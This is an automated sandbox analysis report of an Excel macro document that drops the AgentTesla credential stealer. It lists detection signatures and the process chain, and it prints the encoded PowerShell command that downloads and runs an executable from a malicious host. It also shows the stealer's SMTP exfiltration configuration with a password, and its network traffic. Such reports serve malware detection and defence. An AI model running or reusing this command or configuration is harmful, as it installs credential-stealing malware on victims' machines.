Loading ...

Play interactive tourEdit tour

Analysis Report MV TRIADES.xlsm

Overview

General Information

Sample Name:MV TRIADES.xlsm
Analysis ID:372951
MD5:f7f66672f19f2dabe4f7269e32eb8540
SHA1:688ba6fb074142755fecd74056278b145a282f5a
SHA256:9664740123170b912430759af6cfad9ff784ccd266fe93909022093beff051c7
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AgentTesla
Yara detected Powershell download and execute
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2360 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2028 cmdline: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1320 cmdline: powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • tNDFx.exe (PID: 2288 cmdline: 'C:\Users\user\AppData\Roaming\tNDFx.exe' MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
          • cmd.exe (PID: 2760 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
            • timeout.exe (PID: 2916 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
          • tNDFx.exe (PID: 824 cmdline: C:\Users\user\AppData\Roaming\tNDFx.exe MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
          • tNDFx.exe (PID: 2484 cmdline: C:\Users\user\AppData\Roaming\tNDFx.exe MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "mail@jiratane.comOlaola123@smtp.jiratane.comroot@jiratane.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.tNDFx.exe.6a8f2b8.17.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              6.2.tNDFx.exe.6ac52d8.16.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.tNDFx.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.tNDFx.exe.6ac52d8.16.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    6.2.tNDFx.exe.6a8f2b8.17.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, CommandLine: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2360, ProcessCommandLine: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, ProcessId: 2028

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-Avira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/incomeAvira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/income.exeAvira URL Cloud: Label: malware
                      Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.htmlAvira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/income.exePEAvira URL Cloud: Label: malware
                      Source: http://liverpoolsupporters9.comAvira URL Cloud: Label: malware
                      Source: http://specfloors.netAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 6.2.tNDFx.exe.6a8f2b8.17.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "mail@jiratane.comOlaola123@smtp.jiratane.comroot@jiratane.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeReversingLabs: Detection: 27%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MV TRIADES.xlsmVirustotal: Detection: 44%Perma Link
                      Source: MV TRIADES.xlsmReversingLabs: Detection: 42%
                      Machine Learning detection for sampleShow sources
                      Source: MV TRIADES.xlsmJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
                      Source: Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                      Source: global trafficDNS query: name: specfloors.net
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 22 Mar 2021 14:36:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 22 Mar 2021 11:02:01 GMTETag: "1e1614-11068-5be1dfec2aa31"Accept-Ranges: bytesContent-Length: 69736Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 4e b7 9f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f2 00 00 00 08 00 00 00 00 00 00 4e 11 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 c4 f6 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 11 01 00 4b 00 00 00 00 20 01 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 fc 00 00 68 14 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f1 00 00 00 20 00 00 00 f2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 01 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 73 00 00 5c 9d 00 00 03 00 00 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 08 00 00 0a 00 2a 52 02 28 08 00 00 0a 00 00 02 73 09 00 00 0a 7d 02 00 00 04 2a 36 00 28 7e 00 00 06 6f 25 00 00 0a 00 2a 3e 00 02 72 c6 4c 00 70 03 6f 30 00 00 0a 00 2a 22 02 28 31 00 00 0a 00 2a 56 73 81 00 00 06 28 32 00 00 0a 74 05 00 00 02 80 03 00 00 04 2a 7e 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a c6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a ae 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a de 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a f6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 172.67.176.78 172.67.176.78
                      Source: Joe Sandbox ViewIP Address: 198.54.116.63 198.54.116.63
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpgJump to behavior
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: specfloors.net
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl3.dJ
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: tNDFx.exe, 00000006.00000003.2110396652.00000000056D1000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://jEOkvI.com
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://liverpoolsupporters9.com
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: tNDFx.exe, 00000006.00000002.2134297073.0000000005E20000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: tNDFx.exe, 0000000B.00000002.2351747321.00000000022D6000.00000004.00000001.sdmpString found in binary or memory: http://smtp.jiratane.com
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2115696478.000000001B4A6000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income.exe
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income.exePE
                      Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
